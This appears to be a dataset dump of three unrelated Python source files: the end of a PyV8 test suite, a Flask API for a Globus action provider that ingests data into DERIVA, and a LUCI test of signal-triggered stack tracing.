self.assertEqual("hello flier from javascript", ctxt.eval("hello('flier')"))
# test the auto enable property
with JSContext() as ctxt:
self.assertRaises(ReferenceError, ctxt.eval, "hello('flier')")
extJs.autoEnable = True
self.assertTrue(extJs.autoEnable)
with JSContext() as ctxt:
self.assertEqual("hello flier from javascript", ctxt.eval("hello('flier')"))
extJs.autoEnable = False
self.assertFalse(extJs.autoEnable)
with JSContext() as ctxt:
self.assertRaises(ReferenceError, ctxt.eval, "hello('flier')")
extUnicodeSrc = """function helloW(name) { return "hello " + name + " from javascript"; }"""
extUnicodeJs = JSExtension("helloW/javascript", extUnicodeSrc)
self.assertTrue(extUnicodeJs)
self.assertEqual("helloW/javascript", extUnicodeJs.name)
self.assertEqual(toNativeString(extUnicodeSrc), extUnicodeJs.source)
self.assertFalse(extUnicodeJs.autoEnable)
self.assertTrue(extUnicodeJs.registered)
TestEngine.extUnicodeJs = extUnicodeJs
with JSContext(extensions=['helloW/javascript']) as ctxt:
self.assertEqual("hello flier from javascript", ctxt.eval("helloW('flier')"))
ret = ctxt.eval("helloW('世界')")
self.assertEqual("hello 世界 from javascript", ret if is_py3k else ret.decode('UTF-8'))
def testNativeExtension(self):
extSrc = "native function hello();"
extPy = JSExtension("hello/python", extSrc, lambda func: lambda name: "hello " + name + " from python", register=False)
self.assertTrue(extPy)
self.assertEqual("hello/python", extPy.name)
self.assertEqual(extSrc, extPy.source)
self.assertFalse(extPy.autoEnable)
self.assertFalse(extPy.registered)
extPy.register()
self.assertTrue(extPy.registered)
TestEngine.extPy = extPy
with JSContext(extensions=['hello/python']) as ctxt:
self.assertEqual("hello flier from python", ctxt.eval("hello('flier')"))
def _testSerialize(self):
data = None
self.assertFalse(JSContext.entered)
with JSContext() as ctxt:
self.assertTrue(JSContext.entered)
#ctxt.eval("function hello(name) { return 'hello ' + name; }")
data = JSEngine.serialize()
self.assertTrue(data)
self.assertTrue(len(data) > 0)
self.assertFalse(JSContext.entered)
#JSEngine.deserialize()
self.assertTrue(JSContext.entered)
self.assertEqual('hello flier', JSContext.current.eval("hello('flier');"))
def testEval(self):
with JSContext() as ctxt:
self.assertEqual(3, int(ctxt.eval("1+2")))
def testGlobal(self):
class Global(JSClass):
version = "1.0"
with JSContext(Global()) as ctxt:
vars = ctxt.locals
# getter
self.assertEqual(Global.version, str(vars.version))
self.assertEqual(Global.version, str(ctxt.eval("version")))
self.assertRaises(ReferenceError, ctxt.eval, "nonexists")
# setter
self.assertEqual(2.0, float(ctxt.eval("version = 2.0")))
self.assertEqual(2.0, float(vars.version))
def testThis(self):
class Global(JSClass):
version = 1.0
with JSContext(Global()) as ctxt:
self.assertEqual("[object Global]", str(ctxt.eval("this")))
self.assertEqual(1.0, float(ctxt.eval("this.version")))
def testObjectBuildInMethods(self):
class Global(JSClass):
version = 1.0
with JSContext(Global()) as ctxt:
self.assertEqual("[object Global]", str(ctxt.eval("this.toString()")))
self.assertEqual("[object Global]", str(ctxt.eval("this.toLocaleString()")))
self.assertEqual(Global.version, float(ctxt.eval("this.valueOf()").version))
self.assertTrue(bool(ctxt.eval("this.hasOwnProperty(\"version\")")))
self.assertFalse(ctxt.eval("this.hasOwnProperty(\"nonexistent\")"))
def testPythonWrapper(self):
class Global(JSClass):
s = [1, 2, 3]
d = {'a': {'b': 'c'}, 'd': ['e', 'f']}
g = Global()
with JSContext(g) as ctxt:
ctxt.eval("""
s[2] = s[1] + 2;
s[0] = s[1];
delete s[1];
""")
self.assertEqual([2, 4], g.s)
self.assertEqual('c', ctxt.eval("d.a.b"))
self.assertEqual(['e', 'f'], ctxt.eval("d.d"))
ctxt.eval("""
d.a.q = 4
delete d.d
""")
self.assertEqual(4, g.d['a']['q'])
self.assertEqual(None, ctxt.eval("d.d"))
def _testMemoryAllocationCallback(self):
alloc = {}
def callback(space, action, size):
alloc[(space, action)] = alloc.setdefault((space, action), 0) + size
JSEngine.setMemoryAllocationCallback(callback)
with JSContext() as ctxt:
self.assertFalse((JSObjectSpace.Code, JSAllocationAction.alloc) in alloc)
ctxt.eval("var o = new Array(1000);")
self.assertTrue((JSObjectSpace.Code, JSAllocationAction.alloc) in alloc)
JSEngine.setMemoryAllocationCallback(None)
class TestDebug(unittest.TestCase):
def setUp(self):
self.engine = JSEngine()
def tearDown(self):
del self.engine
events = []
def processDebugEvent(self, event):
try:
logging.debug("receive debug event: %s", repr(event))
self.events.append(repr(event))
except:
logging.error("fail to process debug event")
logging.debug(traceback.extract_stack())
def testEventDispatch(self):
debugger = JSDebugger()
self.assertTrue(not debugger.enabled)
debugger.onBreak = lambda evt: self.processDebugEvent(evt)
debugger.onException = lambda evt: self.processDebugEvent(evt)
debugger.onNewFunction = lambda evt: self.processDebugEvent(evt)
debugger.onBeforeCompile = lambda evt: self.processDebugEvent(evt)
debugger.onAfterCompile = lambda evt: self.processDebugEvent(evt)
with JSContext() as ctxt:
debugger.enabled = True
self.assertEqual(3, int(ctxt.eval("function test() { text = \"1+2\"; return eval(text) } test()")))
debugger.enabled = False
self.assertRaises(JSError, JSContext.eval, ctxt, "throw 1")
self.assertTrue(not debugger.enabled)
self.assertEqual(4, len(self.events))
class TestProfile(unittest.TestCase):
def _testStart(self):
self.assertFalse(profiler.started)
profiler.start()
self.assertTrue(profiler.started)
profiler.stop()
self.assertFalse(profiler.started)
def _testResume(self):
self.assertTrue(profiler.paused)
self.assertEqual(profiler.Modules.cpu, profiler.modules)
profiler.resume()
profiler.resume(profiler.Modules.heap)
# TODO enable profiler with resume
#self.assertFalse(profiler.paused)
class TestAST(unittest.TestCase):
class Checker(object):
def __init__(self, testcase):
self.testcase = testcase
self.called = []
def __enter__(self):
self.ctxt = JSContext()
self.ctxt.enter()
return self
def __exit__(self, exc_type, exc_value, traceback):
self.ctxt.leave()
def __getattr__(self, name):
return getattr(self.testcase, name)
def test(self, script):
JSEngine().compile(script).visit(self)
return self.called
def onProgram(self, prog):
self.ast = prog.toAST()
self.json = json.loads(prog.toJSON())
for decl in prog.scope.declarations:
decl.visit(self)
for stmt in prog.body:
stmt.visit(self)
def onBlock(self, block):
for stmt in block.statements:
stmt.visit(self)
def onExpressionStatement(self, stmt):
stmt.expression.visit(self)
#print type(stmt.expression), stmt.expression
def testBlock(self):
class BlockChecker(TestAST.Checker):
def onBlock(self, stmt):
self.called.append('block')
self.assertEqual(AST.NodeType.Block, stmt.type)
self.assertTrue(stmt.initializerBlock)
self.assertFalse(stmt.anonymous)
target = stmt.breakTarget
self.assertTrue(target)
self.assertFalse(target.bound)
self.assertTrue(target.unused)
self.assertFalse(target.linked)
self.assertEqual(2, len(stmt.statements))
self.assertEqual(['%InitializeVarGlobal("i", 0);', '%InitializeVarGlobal("j", 0);'], [str(s) for s in stmt.statements])
with BlockChecker(self) as checker:
self.assertEqual(['block'], checker.test("var i, j;"))
self.assertEqual("""FUNC
. NAME ""
. INFERRED NAME ""
. DECLS
. . VAR "i"
. . VAR "j"
. BLOCK INIT
. . CALL RUNTIME InitializeVarGlobal
. . . LITERAL "i"
. . . LITERAL 0
. . CALL RUNTIME InitializeVarGlobal
. . . LITERAL "j"
. . . LITERAL 0
""", checker.ast)
self.assertEqual(['FunctionLiteral', {'name': ''},
['Declaration', {'mode': 'VAR'},
['Variable', {'name': 'i'}]
], ['Declaration', {'mode':'VAR'},
['Variable', {'name': 'j'}]
], ['Block',
['ExpressionStatement', ['CallRuntime', {'name': 'InitializeVarGlobal'},
['Literal', {'handle':'i'}],
['Literal', {'handle': 0}]]],
['ExpressionStatement', ['CallRuntime', {'name': 'InitializeVarGlobal'},
['Literal', {'handle': 'j'}],
['Literal', {'handle': 0}]]]
]
], checker.json)
def testIfStatement(self):
class IfStatementChecker(TestAST.Checker):
def onIfStatement(self, stmt):
self.called.append('if')
self.assertTrue(stmt)
self.assertEqual(AST.NodeType.IfStatement, stmt.type)
self.assertEqual(7, stmt.pos)
stmt.pos = 100
self.assertEqual(100, stmt.pos)
self.assertTrue(stmt.hasThenStatement)
self.assertTrue(stmt.hasElseStatement)
self.assertEqual("((value % 2) == 0)", str(stmt.condition))
self.assertEqual("{ s = \"even\"; }", str(stmt.thenStatement))
self.assertEqual("{ s = \"odd\"; }", str(stmt.elseStatement))
self.assertFalse(stmt.condition.isPropertyName)
with IfStatementChecker(self) as checker:
self.assertEqual(['if'], checker.test("var s; if (value % 2 == 0) { s = 'even'; } else { s = 'odd'; }"))
def testForStatement(self):
class ForStatementChecker(TestAST.Checker):
def onForStatement(self, stmt):
self.called.append('for')
self.assertEqual("{ j += i; }", str(stmt.body))
self.assertEqual("i = 0;", str(stmt.init))
self.assertEqual("(i < 10)", str(stmt.condition))
self.assertEqual("(i++);", str(stmt.nextStmt))
target = stmt.continueTarget
self.assertTrue(target)
self.assertFalse(target.bound)
self.assertTrue(target.unused)
self.assertFalse(target.linked)
self.assertFalse(stmt.fastLoop)
def onForInStatement(self, stmt):
self.called.append('forIn')
self.assertEqual("{ out += name; }", str(stmt.body))
self.assertEqual("name", str(stmt.each))
self.assertEqual("names", str(stmt.enumerable))
def onWhileStatement(self, stmt):
self.called.append('while')
self.assertEqual("{ i += 1; }", str(stmt.body))
self.assertEqual("(i < 10)", str(stmt.condition))
def onDoWhileStatement(self, stmt):
self.called.append('doWhile')
self.assertEqual("{ i += 1; }", str(stmt.body))
self.assertEqual("(i < 10)", str(stmt.condition))
self.assertEqual(281, stmt.conditionPos)
with ForStatementChecker(self) as checker:
self.assertEqual(['for', 'forIn', 'while', 'doWhile'], checker.test("""
var i, j;
for (i=0; i<10; i++) { j+=i; }
var names = new Array();
var out = '';
for (name in names) { out += name; }
while (i<10) { i += 1; }
do { i += 1; } while (i<10);
"""))
def testCallStatements(self):
class CallStatementChecker(TestAST.Checker):
def onVariableDeclaration(self, decl):
self.called.append('var')
var = decl.proxy
if var.name == 's':
self.assertEqual(AST.VarMode.var, decl.mode)
self.assertTrue(var.isValidLeftHandSide)
self.assertFalse(var.isArguments)
self.assertFalse(var.isThis)
def onFunctionDeclaration(self, decl):
self.called.append('func')
var = decl.proxy
if var.name == 'hello':
self.assertEqual(AST.VarMode.var, decl.mode)
self.assertTrue(decl.function)
self.assertEqual('(function hello(name) { s = ("Hello " + name); })', str(decl.function))
elif var.name == 'dog':
self.assertEqual(AST.VarMode.var, decl.mode)
self.assertTrue(decl.function)
self.assertEqual('(function dog(name) { (this).name = name; })', str(decl.function))
def onCall(self, expr):
self.called.append('call')
self.assertEqual("hello", str(expr.expression))
self.assertEqual(['"flier"'], [str(arg) for arg in expr.args])
self.assertEqual(159, expr.pos)
def onCallNew(self, expr):
self.called.append('callNew')
self.assertEqual("dog", str(expr.expression))
self.assertEqual(['"cat"'], [str(arg) for arg in expr.args])
self.assertEqual(191, expr.pos)
def onCallRuntime(self, expr):
self.called.append('callRuntime')
self.assertEqual("InitializeVarGlobal", expr.name)
self.assertEqual(['"s"', '0'], [str(arg) for arg in expr.args])
self.assertFalse(expr.isJsRuntime)
with CallStatementChecker(self) as checker:
self.assertEqual(['var', 'func', 'func', 'callRuntime', 'call', 'callNew'], checker.test("""
var s;
function hello(name) { s = "Hello " + name; }
function dog(name) { this.name = name; }
hello("flier");
new dog("cat");
"""))
def testTryStatements(self):
class TryStatementsChecker(TestAST.Checker):
def onThrow(self, expr):
self.called.append('try')
self.assertEqual('"abc"', str(expr.exception))
self.assertEqual(66, expr.pos)
def onTryCatchStatement(self, stmt):
self.called.append('catch')
self.assertEqual("{ throw \"abc\"; }", str(stmt.tryBlock))
#FIXME self.assertEqual([], stmt.targets)
stmt.tryBlock.visit(self)
self.assertEqual("err", str(stmt.variable.name))
self.assertEqual("{ s = err; }", str(stmt.catchBlock))
def onTryFinallyStatement(self, stmt):
self.called.append('finally')
self.assertEqual("{ throw \"abc\"; }", str(stmt.tryBlock))
#FIXME self.assertEqual([], stmt.targets)
self.assertEqual("{ s += \".\"; }", str(stmt.finallyBlock))
with TryStatementsChecker(self) as checker:
self.assertEqual(['catch', 'try', 'finally'], checker.test("""
var s;
try {
throw "abc";
}
catch (err) {
s = err;
};
try {
throw "abc";
}
finally {
s += ".";
}
"""))
def testLiterals(self):
class LiteralChecker(TestAST.Checker):
def onCallRuntime(self, expr):
expr.args[1].visit(self)
def onLiteral(self, litr):
self.called.append('literal')
self.assertFalse(litr.isPropertyName)
self.assertFalse(litr.isNull)
self.assertFalse(litr.isTrue)
def onRegExpLiteral(self, litr):
self.called.append('regex')
self.assertEqual("test", litr.pattern)
self.assertEqual("g", litr.flags)
def onObjectLiteral(self, litr):
self.called.append('object')
self.assertEqual('constant:"name"="flier",constant:"sex"=true',
",".join(["%s:%s=%s" % (prop.kind, prop.key, prop.value) for prop in litr.properties]))
def onArrayLiteral(self, litr):
self.called.append('array')
self.assertEqual('"hello","world",42',
",".join([str(value) for value in litr.values]))
with LiteralChecker(self) as checker:
self.assertEqual(['literal', 'regex', 'literal', 'literal'], checker.test("""
false;
/test/g;
var o = { name: 'flier', sex: true };
var a = ['hello', 'world', 42];
"""))
def testOperations(self):
class OperationChecker(TestAST.Checker):
def onUnaryOperation(self, expr):
self.called.append('unaryOp')
self.assertEqual(AST.Op.BIT_NOT, expr.op)
self.assertEqual("i", expr.expression.name)
#print "unary", expr
def onIncrementOperation(self, expr):
self.fail()
def onBinaryOperation(self, expr):
self.called.append('binOp')
self.assertEqual(AST.Op.ADD, expr.op)
self.assertEqual("i", str(expr.left))
self.assertEqual("j", str(expr.right))
self.assertEqual(36, expr.pos)
#print "bin", expr
def onAssignment(self, expr):
self.called.append('assign')
self.assertEqual(AST.Op.ASSIGN_ADD, expr.op)
self.assertEqual(AST.Op.ADD, expr.binop)
self.assertEqual("i", str(expr.target))
self.assertEqual("1", str(expr.value))
self.assertEqual(53, expr.pos)
self.assertEqual("(i + 1)", str(expr.binOperation))
self.assertTrue(expr.compound)
def onCountOperation(self, expr):
self.called.append('countOp')
self.assertFalse(expr.prefix)
self.assertTrue(expr.postfix)
self.assertEqual(AST.Op.INC, expr.op)
self.assertEqual(AST.Op.ADD, expr.binop)
self.assertEqual(71, expr.pos)
self.assertEqual("i", expr.expression.name)
#print "count", expr
def onCompareOperation(self, expr):
self.called.append('compOp')
if len(self.called) == 4:
self.assertEqual(AST.Op.EQ, expr.op)
self.assertEqual(88, expr.pos) # i==j
else:
self.assertEqual(AST.Op.EQ_STRICT, expr.op)
self.assertEqual(106, expr.pos) # i===j
self.assertEqual("i", str(expr.left))
self.assertEqual("j", str(expr.right))
#print "comp", expr
def onConditional(self, expr):
self.called.append('conditional')
self.assertEqual("(i > j)", str(expr.condition))
self.assertEqual("i", str(expr.thenExpr))
self.assertEqual("j", str(expr.elseExpr))
self.assertEqual(144, expr.thenExprPos)
self.assertEqual(146, expr.elseExprPos)
with OperationChecker(self) as checker:
self.assertEqual(['binOp', 'assign', 'countOp', 'compOp', 'compOp', 'unaryOp', 'conditional'], checker.test("""
var i, j;
i+j;
i+=1;
i++;
i==j;
i===j;
~i;
i>j?i:j;
"""))
def testSwitchStatement(self):
class SwitchStatementChecker(TestAST.Checker):
def onSwitchStatement(self, stmt):
self.called.append('switch')
self.assertEqual('expr', stmt.tag.name)
self.assertEqual(2, len(stmt.cases))
case = stmt.cases[0]
self.assertFalse(case.isDefault)
self.assertTrue(case.label.isString)
self.assertEqual(0, case.bodyTarget.pos)
self.assertEqual(57, case.position)
self.assertEqual(1, len(case.statements))
case = stmt.cases[1]
self.assertTrue(case.isDefault)
self.assertEqual(None, case.label)
self.assertEqual(0, case.bodyTarget.pos)
self.assertEqual(109, case.position)
self.assertEqual(1, len(case.statements))
with SwitchStatementChecker(self) as checker:
self.assertEqual(['switch'], checker.test("""
switch (expr) {
case 'flier':
break;
default:
break;
}
"""))
if __name__ == '__main__':
if "-v" in sys.argv:
level = logging.DEBUG
else:
level = logging.WARN
if "-p" in sys.argv:
sys.argv.remove("-p")
print("Press any key to continue or attach process #%d..." % os.getpid())
input()
logging.basicConfig(level=level, format='%(asctime)s %(levelname)s %(message)s')
logging.info("testing PyV8 module %s with V8 v%s", __version__, JSEngine.version)
unittest.main()
|
api.py
|
from datetime import datetime, timedelta, timezone
import logging.config
import multiprocessing
from flask import Flask, jsonify, request
from globus_action_provider_tools.authentication import TokenChecker
from globus_action_provider_tools.validation import (
request_validator,
response_validator
)
from isodate import duration_isoformat, parse_duration, parse_datetime
import jsonschema
from openapi_core.wrappers.flask import FlaskOpenAPIResponse, FlaskOpenAPIRequest
import cfde_ap.auth
from cfde_ap import CONFIG
from . import actions, error as err, utils
# Flask setup
app = Flask(__name__)
app.config.from_mapping(**CONFIG)
app.url_map.strict_slashes = False
# Logging setup
logging.config.dictConfig(CONFIG["LOGGING"])
logger = logging.getLogger(__name__)
logger.info("\n\n==========CFDE Action Provider started==========\n")
# Globals specific to this instance
TBL = CONFIG["DYNAMO_TABLE"]
ROOT = "/" # Segregate different APs by root path?
TOKEN_CHECKER = TokenChecker(CONFIG["GLOBUS_CC_APP"], CONFIG["GLOBUS_SECRET"],
[CONFIG["GLOBUS_SCOPE"]], CONFIG["GLOBUS_AUD"])
# Clean up environment
utils.clean_environment()
utils.initialize_dmo_table(CONFIG["DYNAMO_TABLE"])
#######################################
# Flask helpers
#######################################
@app.errorhandler(err.ApiError)
def handle_invalid_usage(error):
response = jsonify(error.to_dict())
response.status_code = error.status
return response
@app.before_request
def before_request():
# Service alive check can skip validation
if request.path == "/ping":
return {"success": True}
wrapped_req = FlaskOpenAPIRequest(request)
validation_result = request_validator.validate(wrapped_req)
if validation_result.errors:
raise err.InvalidRequest("; ".join([str(err) for err in validation_result.errors]))
token = request.headers.get("Authorization", "").replace("Bearer ", "")
auth_state = TOKEN_CHECKER.check_token(token)
if not auth_state.identities:
# Return auth errors for debugging - may change in prod for security
raise err.NoAuthentication("; ".join([str(err) for err in auth_state.errors]))
request.auth = auth_state
@app.after_request
def after_request(response):
wrapped_req = FlaskOpenAPIRequest(request)
wrapped_resp = FlaskOpenAPIResponse(response)
validation_result = response_validator.validate(wrapped_req, wrapped_resp)
if validation_result.errors:
logger.error("Error on response: {}, {}"
.format(response.response, validation_result.errors))
raise err.DeveloperError("; ".join([str(err) for err in validation_result.errors]))
return response
#######################################
# API Routes
#######################################
@app.route(ROOT, methods=["GET"])
def meta():
resp = {
"types": ["Action"],
"api_version": "1.0",
"globus_auth_scope": CONFIG["GLOBUS_SCOPE"],
"title": "CFDE Demo Deriva Ingest",
"subtitle": ("A Globus Automate Action Provider to demonstrate ingestion "
"of a properly-formatted BDBag into DERIVA."),
# "description": "",
# "keywords": [],
"visible_to": ["all_authenticated_users"],
"runnable_by": ["urn:globus:groups:id:" + CONFIG["GLOBUS_GROUP"]],
# "administered_by": [],
# "admin_contact": "",
"synchronous": False,
"log_supported": False,
# "maximum_deadline": "",
"input_schema": CONFIG["INPUT_SCHEMA"],
# "event_types": [], # Event-type providers only
}
if not request.auth.check_authorization(resp["visible_to"],
allow_all_authenticated_users=True):
raise err.NotAuthorized("You cannot view this Action Provider.")
return jsonify(resp)
@app.route(ROOT+"run", methods=["POST"])
def run():
req = request.get_json(force=True)
# Validate input
body = req.get("body", {})
try:
jsonschema.validate(body, CONFIG["INPUT_SCHEMA"])
except jsonschema.ValidationError as e:
# Raise just the first line of the exception text, which contains the error
# The entire body and schema are in the exception, which are too verbose
raise err.InvalidRequest(str(e).split("\n")[0])
# Must have data_url if ingest or restore
if body["operation"] in ["ingest", "restore"] and not body.get("data_url"):
raise err.InvalidRequest("You must provide a data_url to ingest or restore.")
# If request_id has been submitted before, return status instead of starting new
try:
status = utils.read_action_by_request(TBL, req["request_id"])
# Otherwise, create new action
except err.NotFound:
# TODO: Accurately estimate completion time
estimated_completion = datetime.now(tz=timezone.utc) + timedelta(days=1)
default_release_after = timedelta(days=30)
job = {
# Start job as ACTIVE - no "waiting" status
"status": "ACTIVE",
# Default these to the principals of whoever is running this action:
"manage_by": request.auth.identities,
"monitor_by": request.auth.identities,
"creator_id": request.auth.effective_identity,
"release_after": default_release_after,
"request_id": req["request_id"]
}
if "label" in req:
job["label"] = req["label"]
# Allow overriding by the request:
if "manage_by" in req:
job["manage_by"] = req["manage_by"]
if "monitor_by" in req:
job["monitor_by"] = req["monitor_by"]
if "release_after" in req:
job["release_after"] = parse_duration(req["release_after"]).tdelta
if "deadline" in req:
deadline = parse_datetime(req["deadline"])
if deadline < estimated_completion:
raise err.InvalidRequest(
f"Processing likely to exceed deadline of {req['deadline']}"
)
# Correct types for JSON serialization and DynamoDB ingest
if isinstance(job["manage_by"], str):
job["manage_by"] = [job["manage_by"]]
else:
job["manage_by"] = list(job["manage_by"])
if isinstance(job["monitor_by"], str):
job["monitor_by"] = [job["monitor_by"]]
else:
job["monitor_by"] = list(job["monitor_by"])
# Standardize datetime to ISO format
job["release_after"] = duration_isoformat(job["release_after"])
# Create status in database (creates action_id)
job = utils.create_action_status(TBL, job)
# start_action() blocks, throws exception on failure, returns on success
start_action(job["action_id"], req["body"])
res = jsonify(utils.translate_status(job))
res.status_code = 202
return res
else:
return jsonify(utils.translate_status(status))
@app.route(ROOT+"<action_id>/status", methods=["GET"])
def status(action_id):
status = utils.read_action_status(TBL, action_id)
if not request.auth.check_authorization(status["monitor_by"]):
raise err.NotAuthorized("You cannot view the status of action {}".format(action_id))
return jsonify(utils.translate_status(status))
@app.route(ROOT+"<action_id>/cancel", methods=["POST"])
def cancel(action_id):
status = utils.read_action_status(TBL, action_id)
if not request.auth.check_authorization(status["manage_by"]):
raise err.NotAuthorized("You cannot cancel action {}".format(action_id))
clean_status = utils.translate_status(status)
if clean_status["status"] in ["SUCCEEDED", "FAILED"]:
raise err.InvalidState("Action {} already completed".format(action_id))
cancel_action(action_id)
new_status = utils.read_action_status(TBL, action_id)
return jsonify(utils.translate_status(new_status))
@app.route(ROOT+"<action_id>/release", methods=["POST"])
def release(action_id):
status = utils.read_action_status(TBL, action_id)
if not request.auth.check_authorization(status["manage_by"]):
raise err.NotAuthorized("You cannot cancel action {}".format(action_id))
clean_status = utils.translate_status(status)
if clean_status["status"] in ["ACTIVE", "INACTIVE"]:
raise err.InvalidState("Action {} not completed and cannot be released".format(action_id))
utils.delete_action_status(TBL, action_id)
return clean_status
#######################################
# Synchronous events
#######################################
def start_action(action_id, action_data):
# Process keyword catalog ID
if action_data.get("catalog_id") in CONFIG["KNOWN_CATALOGS"].keys():
catalog_info = CONFIG["KNOWN_CATALOGS"][action_data["catalog_id"]]
action_data["catalog_id"] = catalog_info["catalog_id"]
# Server must either not be provided, or must match catalog_info exactly
if not action_data.get("server"):
action_data["server"] = catalog_info["server"]
elif action_data["server"] != catalog_info["server"]:
raise ValueError(f"Server '{action_data['server']}' does not match server for "
f"catalog '{action_data['catalog_id']}' ({catalog_info['server']})")
# Ingest Action
elif action_data["operation"] == "ingest":
logger.info(f"{action_id}: Starting Deriva ingest into "
f"{action_data.get('catalog_id', 'new catalog')}")
# Spawn new process
deriva_webauthn_user = cfde_ap.auth.get_webauthn_user()
args = (action_id, action_data["data_url"], deriva_webauthn_user, action_data.get("globus_ep"),
action_data.get("server"), action_data.get("dcc_id"))
driver = multiprocessing.Process(target=action_ingest, args=args, name=action_id)
driver.start()
else:
raise err.InvalidRequest("Operation '{}' unknown".format(action_data["operation"]))
return
def cancel_action(action_id):
# This action doesn't implement cancellation,
# which is valid according to the Automate spec.
# This is a stub in case cancellation is implemented later.
return
#######################################
# Asynchronous actions
#######################################
def action_ingest(action_id, url, deriva_webauthn_user, globus_ep=None, servername=None, dcc_id=None):
# Download ingest BDBag
# Excessive try-except blocks because there's (currently) no process management;
# if the action fails, it needs to always self-report failure
if not servername:
servername = CONFIG["DEFAULT_SERVER_NAME"]
# Ingest into Deriva
logger.debug(f"{action_id}: Ingesting into Deriva")
try:
ingest_res = actions.deriva_ingest(servername, url, deriva_webauthn_user,
dcc_id=dcc_id, globus_ep=globus_ep, action_id=action_id)
if not ingest_res["success"]:
error_status = {
"status": "FAILED",
"details": {
"error": f"Unable to ingest to DERIVA: {ingest_res.get('error')}"
}
}
utils.update_action_status(TBL, action_id, error_status)
return
catalog_id = ingest_res["catalog_id"]
except Exception as e:
logger.exception(e)
error_status = {
"status": "FAILED",
"details": {
"error": f"Error ingesting to DERIVA: {str(e)}"
}
}
logger.error(f"{action_id}: Error ingesting to DERIVA: {repr(e)}")
try:
utils.update_action_status(TBL, action_id, error_status)
except Exception as e2:
with open("ERROR.log", 'w') as out:
out.write(f"Error updating status on {action_id}: '{repr(e2)}'\n\n"
f"After error '{repr(e)}'")
return
# Successful ingest
logger.debug(f"{action_id}: Catalog {dcc_id} populated")
status = {
"status": "SUCCEEDED",
"details": {
"deriva_id": catalog_id,
# "number_ingested": insert_count,
"deriva_link": ingest_res["catalog_url"],
"message": "DERIVA ingest successful",
"error": False
}
}
try:
utils.update_action_status(TBL, action_id, status)
except Exception as e:
with open("ERROR.log", 'w') as out:
out.write(f"Error updating status on {action_id}: '{repr(e)}'\n\n"
f"After success on ID '{catalog_id}'")
# Remove ingested files from disk
# Failed ingests are not removed, which helps debugging
return
|
signal_trace_test.py
|
#!/usr/bin/env vpython3
# Copyright 2017 The LUCI Authors. All rights reserved.
# Use of this source code is governed under the Apache License, Version 2.0
# that can be found in the LICENSE file.
import logging
import os
import signal
import subprocess
import sys
import unittest
import six
THIS_DIR = os.path.dirname(os.path.abspath(__file__))
@unittest.skipIf(
sys.platform == 'win32',
'This test is for platforms other than Windows')
class Test(unittest.TestCase):
def _run(self, cmd, sig, stdin):
p = subprocess.Popen([sys.executable, '-u', '-c', cmd],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
cwd=THIS_DIR)
p.stdout.read(1)
os.kill(p.pid, sig)
# Wait for some output before calling stdin.write(), otherwise there's a
# race condition with SIGUSR2.
e = p.stderr.read(1)
if stdin:
p.stdin.write(stdin)
p.stdin.flush()
p.wait()
e += p.stderr.read()
out = p.stdout.read()
p.stdin.close()
p.stdout.close()
p.stderr.close()
return out, e
def test_SIGUSR1(self):
# The simple case
cmd = ('import signal_trace,sys,time; signal_trace.register(); '
'sys.stdout.write("1"); sys.stdout.flush(); time.sleep(60)')
out, err = self._run(cmd, signal.SIGUSR1, None)
self.assertEqual(b'', out)
self.assertEqual(
b'ERROR:root:\n'
b'** SIGUSR1 received **\n'
b'MainThread:\n'
b' File "<string>", line 1, in <module>\n'
b'** SIGUSR1 end **\n', err)
def test_SIGUSR1_threads(self):
# The multithreaded case.
cmd = ('import signal_trace,sys,time,threading; signal_trace.register(); '
't=threading.Thread(target=time.sleep, args=(60,), name="Awesome"); '
't.daemon=True; t.start(); '
'sys.stdout.write("1"); sys.stdout.flush(); time.sleep(60)')
out, err = self._run(cmd, signal.SIGUSR1, None)
self.assertEqual(b'', out)
self.assertTrue(
err.startswith(b'ERROR:root:\n** SIGUSR1 received **\nAwesome:\n '),
repr(err))
self.assertTrue(err.endswith(b'\n** SIGUSR1 end **\n'), repr(err))
self.assertIn(b'MainThread:', err.splitlines())
def test_SIGUSR2(self):
cmd = ('import signal_trace,sys,time; signal_trace.register(); '
'sys.stdout.write("1"); sys.stdout.flush(); time.sleep(60)')
out, err = self._run(cmd, signal.SIGUSR2, b'exit()\n')
self.assertEqual(b'>>> ', out)
self.assertTrue(
err.startswith(
b'Signal received : entering python shell.\nTraceback:\n'),
repr(err))
if __name__ == '__main__':
os.chdir(THIS_DIR)
if '-v' in sys.argv:
unittest.TestCase.maxDiff = None
logging.basicConfig(
level=logging.DEBUG if '-v' in sys.argv else logging.CRITICAL)
unittest.main()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.